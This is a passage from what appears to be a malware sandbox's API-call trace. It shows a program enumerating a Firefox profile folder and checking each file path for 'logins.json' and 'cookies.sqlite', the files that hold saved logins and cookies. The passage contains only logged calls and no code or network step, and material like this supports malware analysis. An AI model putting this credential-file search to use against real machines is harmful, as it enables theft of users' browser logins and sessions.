lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.085] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0161.085] lstrlenW (lpString="moz-safe-about+home") returned 19 [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x925768 [0161.085] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.085] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.085] VirtualQuery (in: lpAddress=0x925698, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925698 | out: hHeap=0x8e0000) returned 1 [0161.085] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="logins.json") returned 0x0 [0161.085] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpSrch="cookies.sqlite") returned 0x0 [0161.085] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.085] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 0 [0161.085] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.085] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.086] VirtualQuery (in: lpAddress=0x9255c8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255c8 | out: hHeap=0x8e0000) returned 1 [0161.086] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.086] lstrlenW (lpString="\\") returned 1 [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.086] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.086] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.086] lstrlenW (lpString="indexedDB") returned 9 [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9254f8 [0161.086] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.086] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.086] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.086] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="logins.json") returned 0x0 [0161.086] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpSrch="cookies.sqlite") returned 0x0 [0161.086] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.086] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4815eb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4815eb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0161.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.086] lstrlenW (lpString="\\") returned 1 [0161.086] GetProcessHeap () returned 0x8e0000 [0161.086] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.086] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.086] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.086] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.087] lstrlenW (lpString="key3.db") returned 7 [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9254f8 [0161.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.087] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" [0161.087] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.087] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="logins.json") returned 0x0 [0161.087] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db", lpSrch="cookies.sqlite") returned 0x0 [0161.087] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.087] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x850d63f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x850d63f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x850d63f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x501, dwReserved0=0x0, dwReserved1=0x0, cFileName="localstore.rdf", cAlternateFileName="LOCALS~1.RDF")) returned 1 [0161.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.087] lstrlenW (lpString="\\") returned 1 [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.087] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.087] lstrlenW (lpString="localstore.rdf") returned 14 [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.087] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="localstore.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf" [0161.087] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.087] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="logins.json") returned 0x0 [0161.087] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\localstore.rdf", lpSrch="cookies.sqlite") returned 0x0 [0161.087] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.087] GetProcessHeap () returned 0x8e0000 [0161.087] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.088] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6518ad0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x85572e90, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x39, dwReserved0=0x0, dwReserved1=0x0, cFileName="marionette.log", cAlternateFileName="MARION~1.LOG")) returned 1 [0161.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.088] lstrlenW (lpString="\\") returned 1 [0161.088] GetProcessHeap () returned 0x8e0000 [0161.088] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.088] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.088] lstrlenW (lpString="marionette.log") returned 14 [0161.088] GetProcessHeap () returned 0x8e0000 [0161.088] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.088] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="marionette.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" [0161.088] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.088] GetProcessHeap () returned 0x8e0000 [0161.088] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.088] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="logins.json") returned 0x0 [0161.088] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log", lpSrch="cookies.sqlite") returned 0x0 [0161.088] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.088] GetProcessHeap () returned 0x8e0000 [0161.088] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.088] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb50b6e70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5175550, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb5175550, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xef3, dwReserved0=0x0, dwReserved1=0x0, cFileName="mimeTypes.rdf", cAlternateFileName="MIMETY~1.RDF")) returned 1 [0161.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.088] lstrlenW (lpString="\\") returned 1 [0161.088] GetProcessHeap () returned 0x8e0000 [0161.088] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.088] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.088] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.088] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0161.088] GetProcessHeap () returned 0x8e0000 [0161.088] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.088] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.088] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" [0161.089] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.089] GetProcessHeap () returned 0x8e0000 [0161.089] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.089] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="logins.json") returned 0x0 [0161.089] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="cookies.sqlite") returned 0x0 [0161.089] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.089] GetProcessHeap () returned 0x8e0000 [0161.089] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.089] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0161.089] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0161.089] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0161.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 